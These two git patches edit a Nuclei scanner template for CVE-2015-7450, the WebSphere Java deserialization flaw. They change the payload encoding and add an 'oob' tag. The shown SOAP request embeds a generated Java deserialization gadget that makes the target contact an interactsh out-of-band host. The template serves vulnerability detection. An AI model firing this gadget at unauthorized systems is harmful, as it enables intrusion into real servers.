From ca2963beb63c6cd5e6ae8e935bd6ecd869ec12b5 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Fri, 3 Sep 2021 12:15:26 +0530
Subject: [PATCH 1/2] encoding update

---
 cves/2015/CVE-2015-7450.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
index a28bfc6ead..39d042bfcf 100644
--- a/cves/2015/CVE-2015-7450.yaml
+++ b/cves/2015/CVE-2015-7450.yaml
@@ -27,7 +27,7 @@ requests:
         <ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>
         <operationname xsi:type="xsd:string">getUnsavedChanges</operationname>
-        <params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}}</params>
+        <params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}</params>
         <signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>
         </ns1:invoke>
         </SOAP-ENV:Body>

From 9fdac495f7582f3c502742cb6ebbd999f97d18fc Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Fri, 3 Sep 2021 12:16:53 +0530
Subject: [PATCH 2/2] more tags

---
 cves/2015/CVE-2015-7450.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml
index 39d042bfcf..e27a3e815f 100644
--- a/cves/2015/CVE-2015-7450.yaml
+++ b/cves/2015/CVE-2015-7450.yaml
@@ -9,7 +9,7 @@ info:
     - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
     - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
-  tags: cve,cve2015,websphere,deserialization,rce
+  tags: cve,cve2015,websphere,deserialization,rce,oob
 
 requests:
   - raw: